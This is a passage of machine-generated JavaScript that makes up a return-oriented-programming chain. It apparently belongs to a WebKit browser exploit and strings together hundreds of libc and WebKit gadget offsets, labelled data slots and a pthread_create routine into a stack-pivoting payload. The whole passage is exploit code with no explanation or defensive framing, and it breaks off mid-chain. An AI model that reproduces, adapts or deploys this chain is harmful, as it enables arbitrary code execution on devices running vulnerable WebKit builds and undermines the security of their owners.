webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2084:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2085:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148800, //L2086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148816, //L2087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2086:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2087:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148936, //L2088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148920, //L2089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2089:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2088:
db([0, 0]); // 0x0
//_pthread_create__rop:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+149008, //L2091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2091:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149072, //L2093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2093:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149176, //L2094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149192, //L2095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2094:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2095:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2097:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+149320, //L2099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+149304, //L2098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2098:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2099:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2100:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2101:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2102:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2103:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2105:
db([4096, 0]); // 0x1000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+149632, //L2106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2108:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2110:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+149824, //L2111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2111:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149936, //L2113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2113:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2114:
db([65536, 0]); // 0x10000
set_gadget(libc_base+144605,); //pop rdi
//L2115:
db([65536, 0]); // 0x10000
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+150064, //L2117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+150048, //L2116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2120:
ropchain+150216, //L2119
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+160336, //L2121
//L2119:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967248, 4294967295]); // -0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+150312, //L2123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+150368, //L2124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2124:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2126:
db([65536, 0]); // 0x10000
set_gadget(libc_base+763368,); //pop rcx
//L2127:
db([65536, 0]); // 0x10000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+150520, //L2129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2129:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+150576, //L2130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2130:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+150648, //L2132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2132:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2134:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2135:
db([312, 0]); // 0x138
set_gadget(libc_base+764760,); //pop rsi
//L2137:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2139:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+150864, //L2142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+150848, //L2140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2140:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2142:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+151040, //L2145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151056, //L2146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151008, //L2143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+151024, //L2144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2143:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2144:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2145:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2146:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151152, //L2148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151136, //L2147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2147:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2148:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2149:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2150:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+151376, //L2152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151392, //L2153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151360, //L2151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2151:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2152:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2153:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151480, //L2154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151496, //L2156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2154:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2156:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2157:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2159:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+151656, //L2162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151640, //L2160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2162:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+151832, //L2165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151848, //L2166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151800, //L2163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+151816, //L2164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2163:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2166:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151944, //L2168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151928, //L2167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2167:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2170:
db([15, 0]); // 0xf
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+152056, //L2171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2171:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+152208, //L2174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+152224, //L2175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152192, //L2173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2173:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2175:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+152312, //L2176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+152328, //L2178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2178:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2179:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2181:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+152488, //L2184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152472, //L2182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2182:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2184:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+152664, //L2187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+152680, //L2188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152632, //L2185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+152648, //L2186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2185:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2186:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2187:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2188:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+152776, //L2190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+152760, //L2189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2189:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2191:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2192:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+153000, //L2194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+153016, //L2195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152984, //L2193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2193:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2194:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2195:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+153104, //L2196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+153120, //L2198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2196:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2198:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2199:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2200:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2202:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+153296, //L2205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153280, //L2203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2203:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2205:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+153440, //L2208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153408, //L2206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+153424, //L2207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2206:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2207:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2208:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+153512, //L2210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+153568, //L2211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2211:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+153648, //L2213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2213:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2215:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+153768, //L2218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153752, //L2216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2216:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2218:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+153944, //L2221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+153960, //L2222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153912, //L2219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+153928, //L2220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2219:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2220:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2221:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2222:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+154072, //L2223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+154104, //L2225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+154088, //L2224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2223:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2224:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2225:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+154192, //L2227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2227:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+154248, //L2228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2228:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+154320, //L2230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2230:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2232:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2234:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+154480, //L2237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154464, //L2235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2235:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2237:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
